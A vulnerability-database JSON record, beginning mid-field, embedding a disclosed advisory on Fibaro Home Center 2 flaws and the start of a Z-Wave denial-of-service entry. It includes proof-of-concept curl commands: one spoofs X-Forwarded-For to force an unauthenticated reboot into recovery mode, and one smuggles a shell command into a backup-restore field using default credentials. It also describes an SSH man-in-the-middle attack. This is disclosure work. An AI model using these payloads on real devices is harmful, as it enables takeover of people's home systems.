disabled SSH host key check, which enables \n\nman-in-the-middle attacks. \n\n \n\nBy initiating connections to the Fibaro cloud an attacker can eavesdrop on \n\ncommunication between the user and the device. As communication inside the \n\nSSH port-forward is not encrypted (see #4 on management interface), user \n\nsessions, tokens and passwords can be hijacked. In recovery mode, an attacker can \n\nupload firmware without authentication. (Potentially an earlier version with\n\n\nknown remote command execution vulnerability, see #3)\n\n \n\n3) Authenticated remote command execution (versions before 4.550) \n\n(CVE-2021-20991)\n\nAn authenticated user can run commands as root user using a command\ninjection \n\nvulnerability. \n\nSimilar problems were also discovered by Pavel Cheremushkin from Kaspersky \n\nICS Cert: https://securelist.com/fibaro-smart-home/91416/\n\n \n\n4) Unencrypted management interface (CVE-2021-20992)\n\nHome Center devices provide a web based management interface over\nunencrypted \n\nHTTP protocol. Communication between the user and the device can be \n\neavesdropped to hijack sessions, tokens, and passwords. The management \n\ninterface is only available over HTTP on the local network. The vendor \n\nrecommends using the cloud-based management interface, which is accessible\nover \n\nHTTPS and requests are forwarded via an encrypted SSH connection between the\n\n\nFibaro cloud and the device. \n\n \n\n \n\nProof of concept:\n\n-----------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack\n\n \n\nHome Center devices initiate a SSH connection to the Fibaro cloud\n\n \n\n \n\n./etc/init.d/fibaro/RemoteAccess\n\n \n\n\u003csnip\u003e\n\nDAEMON=/usr/bin/ssh\n\n \n\n.... \n\n \n\ncase \"$1\" in\n\n  start)\n\n    \n\n                ..... \n\n \n\n    # get IP\n\n    local\nGET_IP_URL=\"https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria\nl}\u0026HW_Key=${HW_Key}\"\n\n    local IP_Response; IP_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_IP_URL}\" | tr -d \u0027\n!\"#$%\u0026|\u0027\"\u0027\"\u0027|()*+,/:;\u003c=\u003e?@[|\\\\|]|^`|\\||{}~\u0027)\n\n \n\n    # get PORT\n\n    local\nGET_PORT_URL=\"https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S\nerial}\u0026HW_Key=${HW_Key}\"\n\n    local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_PORT_URL}\" | tr -d \u0027\n!\"#$%\u0026|\u0027\"\u0027\"\u0027|()*+,/:;\u003c=\u003e?@[|\\\\|]|^`|\\||{}~\u0027)\n\n \n\n                .... \n\n                \n\n    start-stop-daemon --start --background --pidfile \"${PIDFILE}\"\n--make-pidfile --startas /usr/bin/screen \\\n\n    -- -DmS ${NAME} ${DAEMON} -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \"${PORT_Response}\":localhost:80\nremote2@\"${IP_Response}\"\n\n\u003c/snip\u003e\n\n \n\nThe device uses dropbear ssh to initiate the connection; option -y disables\nany \n\nhost-key checks, voiding much of the otherwise added transport-layer\nsecurity \n\nby SSH: \"Always accept hostkeys if they are unknown.\"\n\n \n\nThe above \"get IP\" endpoint returns the address of the Fibaro cloud, e.g.: \n\nlb-1.eu.ra.fibaro.com\n\n \n\nAn attacker can use DNS spoofing or other means to intercept the connection. \nBy \n\nusing any hostkey, the attacker can successfully authenticate the SSH \n\nconnection. Once the connection is authenticated, the client initiates a\nremote \n\nport-forward:\n\n-R \"${PORT_Response}\":localhost:80\n\n \n\nThis enables the attacker to access port 80 (management interface) of the \n\ndevice. \n\n \n\nA similar problem exists for remote support connections:\n\n \n\n./opt/fibaro/scripts/remote-support.lua\n\n\u003csnip\u003e\n\nfunction handleResponse(response)\n\n  responseJson = json.decode(response.data)\n\n  print(json.encode(responseJson))\n\n \n\n  local autoSSHCommand = \u0027ssh -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \u0027  .. responseJson.private_ip..  \u0027:\u0027\n.. responseJson.port .. \u0027:localhost:22 remote2@\u0027 .. responseJson.ip\n\n  os.execute(autoSSHCommand)\n\nend\n\n \n\nfunction getSupportData()\n\n  remoteUrl=\u0027https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=\u0027\n.. serialNumber .. \u0027\u0026HW_Key=\u0027 .. HWKey\n\n  print(remoteUrl)\n\n \n\n  http = net.HTTPClient({timeout = 5000})\n\n \n\n  http:request(remoteUrl, {\n\n    options = {\n\n      method = \u0027GET\u0027\n\n    },\n\n    success = function(response)\n\n      handleResponse(response)\n\n    end,\n\n    error = function(error)\n\n      print(error)\n\n    end\n\n  })\n\nend\n\n \n\ngetSupportData()\n\n\u003c/snip\u003e\n\n \n\nHere, the remote support endpoint returns the following data:\n\n{\"ip\":\"fwd-support.eu.ra.fibaro.com\",\"port\":\"XXXXX\",\"private_ip\":\"10.100.YYY\n.ZZZ\"}\n\n \n\nThe same dropbear ssh client is used with option -y. In this case, port 22 \n\n(ssh) is made accessible through the port-forward. However, the device only \n\nallows public key authentication with a hard-coded SSH key. No further\ntesting \n\nhas been done on compromising the support SSH connection. \n\n \n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode\n\n \n\nThe device is running a nginx server, which forwards some requests to a \n\nlighttpd server (8000) for further processing:\n\n\u003csnip\u003e\n\n                                proxy_set_header X-Forwarded-For\n$proxy_add_x_forwarded_for;\n\n                                \n\n        location ~* \\.php$ {\n\n            proxy_pass   http://127.0.0.1:8000;\n\n        }\n\n \n\n        location ~* \\.php\\?.* {\n\n            proxy_pass   http://127.0.0.1:8000;\n\n        }\n\n\u003c/snip\u003e\n\n \n\nThe lighttpd server is not only accessible locally, but also via the local \n\nnetwork. \n\n \n\nAuthentication and authorization is implemented in PHP and there is a\nspecial \n\ncheck for connections originating from within the host. However, when\nchecking \n\nthe remote IP address, the header X-Forwarded-For is also considered:\n\n \n\n./var/www/authorize.php\n\n\u003csnip\u003e\n\nfunction isLocalRequest()\n\n{\n\n    $ipAddress = \"\";\n\n    if(!empty($_SERVER[\u0027HTTP_X_FORWARDED_FOR\u0027])) \n\n        $ipAddress = $_SERVER[\u0027HTTP_X_FORWARDED_FOR\u0027];\n\n    else\n\n        $ipAddress = $_SERVER[\u0027REMOTE_ADDR\u0027];\n\n \n\n    $whitelist = array( \u0027127.0.0.1\u0027, \u0027::1\u0027 );\n\n    if(in_array($ipAddress, $whitelist))\n\n        return true;\n\n \n\n    return false;\n\n}\n\n\u003c/snip\u003e\n\n \n\nAs the lighttpd service available via the network, an attacked can inject\nthe \n\nrequired header X-Forwarded-For as well. \n\n \n\nThe check isLocalRequest is used to \"secure\" multiple endpoints:\n\n \n\n./var/www/services/system/shutdown.php\n\n\u003csnip\u003e\n\n\u003c?php\n\n    require_once(\"../../authorize.php\");\n\n \n\n    if (!isLocalRequest() \u0026\u0026 !isAuthorized())\n\n    {\n\n       sendUnauthorized();\n\n    }\n\n    else\n\n    {\n\n        exec(\"systemShutdown\");\n\n    }\n\n?\u003e\n\n\u003c/snip\u003e\n\n \n\n./var/www/services/system/reboot.php\n\n\u003csnip\u003e\n\n \n\nfunction authorize() \n\n{\n\n    return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER,\nrole::INSTALLER));\n\n}\n\n \n\nfunction handlePOST($text)\n\n{\n\n    if (!isLocalRequest() \u0026\u0026 !authorize())\n\n    {\n\n       sendUnauthorized();\n\n       return;\n\n    }\n\n \n\n    $params = tryDecodeJson($text);\n\n    if(!is_null($params) \u0026\u0026 isset($params-\u003erecovery) \u0026\u0026 $params-\u003erecovery\n=== true)\n\n        exec(\"rebootToRecovery\");\n\n    else\n\n        exec(\"systemReboot\");\n\n}\n\n \n\n$requestBody = file_get_contents(\u0027php://input\u0027);\n\n$requestMethod = $_SERVER[\u0027REQUEST_METHOD\u0027];\n\n \n\nif ($requestMethod == \"POST\") \n\n    handlePOST($requestBody);\n\nelse \n\n    setStatusMethodNotAllowed();\n\n \n\n\u003c/snip\u003e\n\n \n\nAn attacker can issue the the following HTTP request to reboot the device\ninto \n\nrecovery mode:\n\ncurl -H \u0027X-Forwarded-For: 127.0.0.1\u0027 -H \u0027Content-Type: application/json\u0027 -d\n\u0027{\"recovery\":true}\u0027  http://DEVICE:8000/services/system/reboot.php\n\n \n\nIn recovery mode, firmware images can be updated without authentication. \n\n \n\n \n\n3) Authenticated remote command execution (versions before 4.550)\n\n \n\nBackup \u0026 restore operations could be triggered though HTTP endpoints:\n\n \n\n./var/www/services/system/backups.php\n\n\u003csnip\u003e\n\nfunction restoreBackup($params)\n\n{\n\n    if (getNumberOfInstances(\u0027{screen} SCREEN -dmS RESTORE\u0027) \u003e 0)\n\n    {\n\n        setStatusTooManyRequests();\n\n        return;\n\n    }\n\n \n\n    $type = $params-\u003etype;\n\n    $id = $params-\u003eid;\n\n    $version = $params-\u003eversion;\n\n \n\n    if (is_null($id) || !is_numeric($id) || $id \u003c 1 ) \n\n    {\n\n        setStatusBadRequest();\n\n        return;\n\n    }\n\n \n\n    $hcVersion = exec(\"cat /mnt/hw_data/serial | cut -c1-3\");\n\n \n\n    if ($type == \"local\" \u0026\u0026 $hcVersion == \"HC2\" || $type == \"remote\") \n\n    {\n\n        $version ?\n\n                exec(\u0027screen -dmS RESTORE restoreBackup.sh --\u0027 . $type. \u0027 \u0027. \n$id . \u0027 \u0027 . $version) :\n\n                exec(\u0027screen -dmS RESTORE restoreBackup.sh --\u0027 . $type. \u0027 \u0027. \n$id);\n\n    }\n\n    else \n\n    {\n\n        setStatusBadRequest();\n\n        return;\n\n    }\n\n \n\n    setStatusAccepted();\n\n}\n\n\u003c/snip\u003e\n\n \n\nThe parameter $version is not sanitized or escaped, which allows an attacker\nto \n\ninject shell commands into the exec() call:\n\n \n\ncat \u003e /tmp/exploit \u003c\u003c- EOM\n\n{\"action\": \"restore\", \"params\": {\"type\": \"remote\", \"id\": 1, \"version\": \"1;\nINJECTED COMMAND\"}}\n\nEOM\n\n \n\ncurl -H \u0027Authorization: Basic YWRtaW46YWRtaW4=\u0027 -H \u0027content-type:\napplication/json\u0027 -d@/tmp/exploit  http://DEVICE/services/system/backups.php\n\n\n \n\nVersion 4.550 and later have proper escaping:\n\n\u003csnip\u003e\n\n    $version = escapeshellarg($params-\u003eversion);\n\n\u003c/snip\u003e\n\n \n\n \n\n4) Unencrypted management interface\n\n \n\nNMMAP shows a few open ports on the box:\n\nPORT     STATE SERVICE\n\n22/tcp   open  ssh\n\n80/tcp   open  http\n\n8000/tcp open  http-alt\n\n \n\nBoth 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. \n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVulnerable / tested versions:\n\n-----------------------------\n\nVulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest\nversion \n\nat the time of the discovery\n\nVulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530\n\n \n\nSolution:\n\n---------\n\nUpgrade to the version 4.610 or latest version, which fixes vulnerabilities\n1, \n\n2 and 3. \n\n \n\nVulnerability 4 is not fixed as the vendor assumes that the local network is\n\n\ntrusted and the device only provides wired network access. Furthermore, the \n\nvendor recommends using the cloud-based management interface, which is \n\naccessible over HTTPS and requests are forwarded via an encrypted SSH \n\nconnection between the Fibaro cloud and the device. \n\n \n\n \n\nAdvisory URL:\n\n-------------\n\nhttps://www.iot-inspector.com/blog/advisory-fibaro-home-center/\n\n \n\n \n\nVendor contact timeline:\n\n------------------------\n\n2020-11-18: Contacting Fibaro through support@fibaro.com, \n\n            support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com\n\n2020-11-23: Contacting Fibaro on Facebook \u0026 LinkedIn, got response on\nLinkedIn\n\n2020-11-24: Adivsory sent to Fibaro by email\n\n2020-12-01: Fibaro confirmed the receipt of the advisory\n\n2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes\n\n2021-03-16: Fibaro beta release (4.601) with the fixes\n\n2021-03-24: Fibaro applies for CVE numbers\n\n2021-03-31: Fibaro GA release (4.610) with the fix\n\n2021-04-08: IoT Inspector Research Lab publishes advisory\n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nThe IoT Inspector Research Lab is an integrated part of IoT Inspector. \n\n \n\nIoT Inspector is a platform for automated security analysis and compliance \n\nchecks of IoT firmware. Our mission is to secure the Internet of Things. In \n\norder to discover vulnerabilities and vulnerability patterns within IoT\ndevices\n\nand to further enhance automated identification that allows for scalable \n\ndetection within IoT Inspector, we conduct excessive security research in\nthe\n\narea of IoT. \n\n \n\nWhenever the IoT Inspector Research Lab discovers vulnerabilities in IoT \n\nfirmware, we aim to responsibly disclose relevant information to the vendor\n\nof the affected IoT device as well as the general public in a way that \n\nminimizes potential harm and encourages further security analyses of IoT \n\nsystems. \n\n \n\nYou can find our responsible disclosure policy here:\n\nhttps://www.iot-inspector.com/responsible-disclosure-policy/\n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nInterested in using IoT Inspector for your research or product?\n\n \n\nMail: research at iot-inspector dot com\n\nWeb: https://www.iot-inspector.com\n\nBlog: https://www.iot-inspector.com/blog/\n\nTwitter: https://twitter.com/iotinspector\n\n \n\nEOF Marton Illes / @2021\n\n \n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20990"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          }
        ],
        "trust": 1.08
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "PACKETSTORM",
            "id": "162243",
            "trust": 1.8
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20990",
            "trust": 1.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20990",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20990"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "id": "VAR-202104-0468",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.5
      },
      "last_update_date": "2024-11-23T22:05:09.380000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Fibaro Home Center 2 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147746"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-306",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center/"
          },
          {
            "trust": 1.8,
            "url": "http://seclists.org/fulldisclosure/2021/apr/27"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/162243/fibaro-home-center-mitm-missing-authentication-code-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20990"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/863.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_ip.php?pk_accesspoint=${hc2_seria"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com"
          },
          {
            "trust": 0.1,
            "url": "https://securelist.com/fibaro-smart-home/91416/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/responsible-disclosure-policy/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/blog/"
          },
          {
            "trust": 0.1,
            "url": "http://device:8000/services/system/reboot.php"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20991"
          },
          {
            "trust": 0.1,
            "url": "http://127.0.0.1:8000;"
          },
          {
            "trust": 0.1,
            "url": "https://twitter.com/iotinspector"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_support_route.php?pk_accesspoint=\u0027"
          },
          {
            "trust": 0.1,
            "url": "http://device/services/system/backups.php"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_port.php?pk_accesspoint=${hc2_s"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20989"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20992"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/en/about-us/"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20990"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20990"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20990"
          },
          {
            "date": "2021-04-20T16:14:10",
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "date": "2021-04-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          },
          {
            "date": "2021-04-19T14:15:11.710000",
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20990"
          },
          {
            "date": "2022-08-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          },
          {
            "date": "2024-11-21T05:47:20.700000",
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "FIBARO Home Center 2 Access control error vulnerability",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "access control error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202201-0274

    Vulnerability from variot - Updated: 2024-08-14 14:18

    Z-Wave devices based on Silicon Labs 500 series chipsets using S2, including but likely not limited to the ZooZ ZST10 version 6.04, ZooZ ZEN20 version 5.03, ZooZ ZEN25 version 5.03, Aeon Labs ZW090-A version 3.95, and Fibaro FGWPB-111 version 4.3, are susceptible to denial of service and resource exhaustion via malformed SECURITY NONCE GET, SECURITY NONCE GET 2, NO OPERATION, or NIF REQUEST messages. Various Silicon Labs Z-Wave chipsets do not support encryption, can be downgraded to not use weaker encryption, and are vulnerable to denial of service. Some of these vulnerabilities are inherent in Z-Wave protocol specifications.CVE-2020-10137 Unknown CVE-2020-9057 Affected Vendor Statement: This is a known weakness with unencrypted traffic. S0 and S2 security can encrypt application data. CVE-2020-9058 Affected Vendor Statement: This is a known weakness with unencrypted traffic. S0 and S2 can encrypt application data. CVE-2020-9059 Affected Vendor Statement: This is a known weakness with S0 security. CVE-2020-9060 Affected Vendor Statement: This is a known weakness with S2 security. CVE-2020-9061 Affected Vendor Statement: This is a known weakness with S0 and S2 security.CVE-2020-10137 Unknown CVE-2020-9057 Affected Vendor Statement: This is a known weakness with unencrypted traffic. S0 and S2 security can encrypt application data. CVE-2020-9058 Affected Vendor Statement: This is a known weakness with unencrypted traffic. S0 and S2 can encrypt application data. CVE-2020-9059 Affected Vendor Statement: This is a known weakness with S0 security. CVE-2020-9060 Affected Vendor Statement: This is a known weakness with S2 security. CVE-2020-9061 Affected Vendor Statement: This is a known weakness with S0 and S2 security. Products from multiple vendors contain resource exhaustion vulnerabilities.Service operation interruption (DoS) It may be in a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202201-0274",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "zw090-a",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "aeotec",
            "version": "3.95"
          },
          {
            "model": "zen25",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zooz",
            "version": "5.03"
          },
          {
            "model": "500 series",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "silabs",
            "version": "*"
          },
          {
            "model": "fgwpb-111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "4.3"
          },
          {
            "model": "zst10",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zooz",
            "version": "6.04"
          },
          {
            "model": "zen20",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zooz",
            "version": "5.03"
          },
          {
            "model": "zen20",
            "scope": null,
            "trust": 0.8,
            "vendor": "zooz",
            "version": null
          },
          {
            "model": "zen25",
            "scope": null,
            "trust": 0.8,
            "vendor": "zooz",
            "version": null
          },
          {
            "model": "fgwpb-111",
            "scope": null,
            "trust": 0.8,
            "vendor": "fibaro",
            "version": null
          },
          {
            "model": "z-stick gen5 +",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30a2\u30a4\u30aa\u30c6\u30c3\u30af",
            "version": null
          },
          {
            "model": "500 \u30b7\u30ea\u30fc\u30ba",
            "scope": null,
            "trust": 0.8,
            "vendor": "silicon",
            "version": null
          },
          {
            "model": "zst10",
            "scope": null,
            "trust": 0.8,
            "vendor": "zooz",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9060"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "This document was written by Timur Snoke and Art Manion.Statement Date:\u00a0\u00a0 June 30, 2020",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#142629"
          }
        ],
        "trust": 0.8
      },
      "cve": "CVE-2020-9060",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "CVE-2020-9060",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "VHN-187185",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:A/AC:L/AU:N/C:N/I:N/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.8,
                "id": "CVE-2020-9060",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Adjacent Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 6.5,
                "baseSeverity": "Medium",
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2020-9060",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
